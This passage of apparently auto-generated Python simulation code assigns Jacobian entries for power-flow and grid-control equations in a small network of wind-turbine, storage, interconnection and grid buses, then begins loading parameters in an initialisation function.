struct[0].Gy[6,16] = V_STlv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy[6,17] = V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy[7,6] = 2*V_STlv*(-b_STmv_STlv - bs_STmv_STlv/2) + V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy[7,7] = V_STlv*V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy[7,16] = V_STlv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy[7,17] = V_STlv*V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) + g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy[8,0] = V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy[8,1] = V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy[8,8] = V_W1lv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv)) + 2*V_W1mv*(g_W1mv_W1lv + g_W1mv_W2mv) + V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy[8,9] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv)) + V_W1mv*V_W2mv*(-b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy[8,10] = V_W1mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy[8,11] = V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy[9,0] = V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy[9,1] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy[9,8] = V_W1lv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv)) + 2*V_W1mv*(-b_W1mv_W1lv - b_W1mv_W2mv - bs_W1mv_W1lv/2 - bs_W1mv_W2mv/2) + V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy[9,9] = V_W1lv*V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv)) + V_W1mv*V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy[9,10] = V_W1mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy[9,11] = V_W1mv*V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy[10,2] = V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy[10,3] = V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy[10,8] = V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy[10,9] = V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy[10,10] = V_W1mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv)) + V_W2lv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv)) + 2*V_W2mv*(g_W1mv_W2mv + g_W2mv_W2lv + g_W2mv_W3mv) + V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy[10,11] = V_W1mv*V_W2mv*(-b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(-b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv)) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy[10,12] = V_W2mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy[10,13] = V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy[11,2] = V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy[11,3] = V_W2lv*V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy[11,8] = V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy[11,9] = V_W1mv*V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy[11,10] = V_W1mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv)) + V_W2lv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv)) + 2*V_W2mv*(-b_W1mv_W2mv - b_W2mv_W2lv - b_W2mv_W3mv - bs_W1mv_W2mv/2 - bs_W2mv_W2lv/2 - bs_W2mv_W3mv/2) + V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy[11,11] = V_W1mv*V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv)) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy[11,12] = V_W2mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy[11,13] = V_W2mv*V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy[12,4] = V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy[12,5] = V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy[12,10] = V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy[12,11] = V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy[12,12] = V_POImv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv)) + V_W2mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv)) + V_W3lv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv)) + 2*V_W3mv*(g_W2mv_W3mv + g_W3mv_POImv + g_W3mv_W3lv)
struct[0].Gy[12,13] = V_POImv*V_W3mv*(-b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(-b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy[12,14] = V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy[12,15] = V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy[13,4] = V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy[13,5] = V_W3lv*V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy[13,10] = V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy[13,11] = V_W2mv*V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy[13,12] = V_POImv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv)) + V_W2mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv)) + V_W3lv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv)) + 2*V_W3mv*(-b_W2mv_W3mv - b_W3mv_POImv - b_W3mv_W3lv - bs_W2mv_W3mv/2 - bs_W3mv_POImv/2 - bs_W3mv_W3lv/2)
struct[0].Gy[13,13] = V_POImv*V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy[13,14] = V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy[13,15] = V_POImv*V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) + g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy[14,12] = V_POImv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy[14,13] = V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy[14,14] = V_POI*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv)) + 2*V_POImv*(g_POI_POImv + g_STmv_POImv + g_W3mv_POImv) + V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy[14,15] = V_POI*V_POImv*(-b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv)) + V_POImv*V_STmv*(-b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(-b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy[14,16] = V_POImv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv))
struct[0].Gy[14,17] = V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv))
struct[0].Gy[14,18] = V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy[14,19] = V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy[15,12] = V_POImv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy[15,13] = V_POImv*V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) + g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy[15,14] = V_POI*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv)) + 2*V_POImv*(-b_POI_POImv - b_STmv_POImv - b_W3mv_POImv - bs_POI_POImv/2 - bs_STmv_POImv/2 - bs_W3mv_POImv/2) + V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy[15,15] = V_POI*V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv)) + V_POImv*V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy[15,16] = V_POImv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv))
struct[0].Gy[15,17] = V_POImv*V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) + g_STmv_POImv*cos(theta_POImv - theta_STmv))
struct[0].Gy[15,18] = V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy[15,19] = V_POI*V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) + g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy[16,6] = V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy[16,7] = V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy[16,14] = V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv))
struct[0].Gy[16,15] = V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv))
struct[0].Gy[16,16] = V_POImv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_STlv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv)) + 2*V_STmv*(g_STmv_POImv + g_STmv_STlv)
struct[0].Gy[16,17] = V_POImv*V_STmv*(-b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(-b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy[17,6] = V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy[17,7] = V_STlv*V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) + g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy[17,14] = V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv))
struct[0].Gy[17,15] = V_POImv*V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) + g_STmv_POImv*cos(theta_POImv - theta_STmv))
struct[0].Gy[17,16] = V_POImv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_STlv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv)) + 2*V_STmv*(-b_STmv_POImv - b_STmv_STlv - bs_STmv_POImv/2 - bs_STmv_STlv/2)
struct[0].Gy[17,17] = V_POImv*V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy[18,14] = V_POI*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy[18,15] = V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy[18,18] = V_GRID*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) + 2*V_POI*(g_POI_GRID + g_POI_POImv) + V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy[18,19] = V_GRID*V_POI*(-b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI)) + V_POI*V_POImv*(-b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy[18,20] = V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy[18,21] = V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy[19,14] = V_POI*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy[19,15] = V_POI*V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) + g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy[19,18] = V_GRID*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI)) + 2*V_POI*(-b_POI_GRID - b_POI_POImv - bs_POI_GRID/2 - bs_POI_POImv/2) + V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy[19,19] = V_GRID*V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) + V_POI*V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy[19,20] = V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy[19,21] = V_GRID*V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) + g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy[20,18] = V_GRID*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy[20,19] = V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy[20,20] = 2*V_GRID*g_POI_GRID + V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy[20,21] = V_GRID*V_POI*(-b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy[20,25] = -S_n_GRID/S_base
struct[0].Gy[21,18] = V_GRID*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy[21,19] = V_GRID*V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) + g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy[21,20] = 2*V_GRID*(-b_POI_GRID - bs_POI_GRID/2) + V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy[21,21] = V_GRID*V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy[21,26] = -S_n_GRID/S_base
struct[0].Gy[22,20] = K_p_GRID*(-i_d_GRID*sin(delta_GRID - theta_GRID) - i_q_GRID*cos(delta_GRID - theta_GRID))
struct[0].Gy[22,21] = K_p_GRID*(V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID))
struct[0].Gy[22,23] = K_p_GRID*(-2*R_v_GRID*i_d_GRID - V_GRID*sin(delta_GRID - theta_GRID))
struct[0].Gy[22,24] = K_p_GRID*(-2*R_v_GRID*i_q_GRID - V_GRID*cos(delta_GRID - theta_GRID))
struct[0].Gy[22,27] = K_p_GRID
struct[0].Gy[23,20] = -sin(delta_GRID - theta_GRID)
struct[0].Gy[23,21] = V_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy[23,23] = -R_v_GRID
struct[0].Gy[23,24] = X_v_GRID
struct[0].Gy[24,20] = -cos(delta_GRID - theta_GRID)
struct[0].Gy[24,21] = -V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy[24,23] = -X_v_GRID
struct[0].Gy[24,24] = -R_v_GRID
struct[0].Gy[25,20] = i_d_GRID*sin(delta_GRID - theta_GRID) + i_q_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy[25,21] = -V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy[25,23] = V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy[25,24] = V_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy[26,20] = i_d_GRID*cos(delta_GRID - theta_GRID) - i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy[26,21] = V_GRID*i_d_GRID*sin(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy[26,23] = V_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy[26,24] = -V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy[27,22] = -1/Droop_GRID
struct[0].Gy[27,29] = K_sec_GRID
struct[0].Gy[29,28] = -K_p_agc
if mode > 12:
struct[0].Fu[1,23] = 1
struct[0].Fu[2,22] = 1/T_v_GRID
struct[0].Fu[2,26] = K_q_GRID/T_v_GRID
struct[0].Gu[0,0] = -1/S_base
struct[0].Gu[1,1] = -1/S_base
struct[0].Gu[2,2] = -1/S_base
struct[0].Gu[3,3] = -1/S_base
struct[0].Gu[4,4] = -1/S_base
struct[0].Gu[5,5] = -1/S_base
struct[0].Gu[6,6] = -1/S_base
struct[0].Gu[7,7] = -1/S_base
struct[0].Gu[8,8] = -1/S_base
struct[0].Gu[9,9] = -1/S_base
struct[0].Gu[10,10] = -1/S_base
struct[0].Gu[11,11] = -1/S_base
struct[0].Gu[12,12] = -1/S_base
struct[0].Gu[13,13] = -1/S_base
struct[0].Gu[14,14] = -1/S_base
struct[0].Gu[15,15] = -1/S_base
struct[0].Gu[16,16] = -1/S_base
struct[0].Gu[17,17] = -1/S_base
struct[0].Gu[18,18] = -1/S_base
struct[0].Gu[19,19] = -1/S_base
struct[0].Gu[20,20] = -1/S_base
struct[0].Gu[21,21] = -1/S_base
struct[0].Gu[22,23] = K_p_GRID
struct[0].Gu[27,25] = 1/Droop_GRID
struct[0].Hx[11,0] = V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Hy[0,0] = 1
struct[0].Hy[1,2] = 1
struct[0].Hy[2,4] = 1
struct[0].Hy[3,6] = 1
struct[0].Hy[4,8] = 1
struct[0].Hy[5,10] = 1
struct[0].Hy[6,12] = 1
struct[0].Hy[7,14] = 1
struct[0].Hy[8,16] = 1
struct[0].Hy[9,18] = 1
struct[0].Hy[10,20] = 1
struct[0].Hy[11,20] = i_d_GRID*sin(delta_GRID - theta_GRID) + i_q_GRID*cos(delta_GRID - theta_GRID)
struct[0].Hy[11,21] = -V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Hy[11,23] = 2*R_v_GRID*i_d_GRID + V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Hy[11,24] = 2*R_v_GRID*i_q_GRID + V_GRID*cos(delta_GRID - theta_GRID)
def ini_nn(struct,mode):
# Parameters:
S_base = struct[0].S_base
g_W1mv_W2mv = struct[0].g_W1mv_W2mv
b_W1mv_W2mv = struct[0].b_W1mv_W2mv
bs_W1mv_W2mv = struct[0].bs_W1mv_W2mv
g_W2mv_W3mv = struct[0].g_W2mv_W3mv
b_W2mv_W3mv = struct[0].b_W2mv_W3mv
bs_W2mv_W3mv = struct[0].bs_W2mv_W3mv
g_W3mv_POImv = struct[0].g_W3mv_POImv
b_W3mv_POImv = struct[0].b_W3mv_POImv
bs_W3mv_POImv = struct[0].bs_W3mv_POImv
g_STmv_POImv = struct[0].g_STmv_POImv
b_STmv_POImv = struct[0].b_STmv_POImv
bs_STmv_POImv = struct[0].bs_STmv_POImv
g_POI_GRID = struct[0].g_POI_GRID
b_POI_GRID = struct[0].b_POI_GRID
bs_POI_GRID = struct[0].bs_POI_GRID
g_POI_POImv = struct[0].g_POI_POImv
b_POI_POImv = struct[0].b_POI_POImv
bs_POI_POImv = struct[0].bs_POI_POImv
g_W1mv_W1lv = struct[0].g_W1mv_W1lv
b_W1mv_W1lv = struct[0].b_W1mv_W1lv
bs_W1mv_W1lv = struct[0].bs_W1mv_W1lv
g_W2mv_W2lv = struct[0].g_W2mv_W2lv
b_W2mv_W2lv = struct[0].b_W2mv_W2lv
bs_W2mv_W2lv = struct[0].bs_W2mv_W2lv
g_W3mv_W3lv = struct[0].g_W3mv_W3lv
b_W3mv_W3lv = struct[0].b_W3mv_W3lv
bs_W3mv_W3lv = struct[0].bs_W3mv_W3lv
g_STmv_STlv = struct[0].g_STmv_STlv
b_STmv_STlv = struct[0].b_STmv_STlv
bs_STmv_STlv = struct[0].bs_STmv_STlv
U_W1lv_n = struct[0].U_W1lv_n
U_W2lv_n = struct[0].U_W2lv_n
U_W3lv_n = struct[0].U_W3lv_n
U_STlv_n = struct[0].U_STlv_n
U_W1mv_n = struct[0].U_W1mv_n
U_W2mv_n = struct[0].U_W2mv_n
U_W3mv_n = struct[0].U_W3mv_n
U_POImv_n = struct[0].U_POImv_n
U_STmv_n = struct[0].U_STmv_n
U_POI_n = struct[0].U_POI_n
U_GRID_n = struct[0].U_GRID_n
S_n_GRID = struct[0].S_n_GRID
Omega_b_GRID = struct[0].Omega_b_GRID
K_p_GRID = struct[0].K_p_GRID
T_p_GRID = struct[0].T_p_GRID
K_q_GRID = struct[0].K_q_GRID
T_v_GRID = struct[0].T_v_GRID
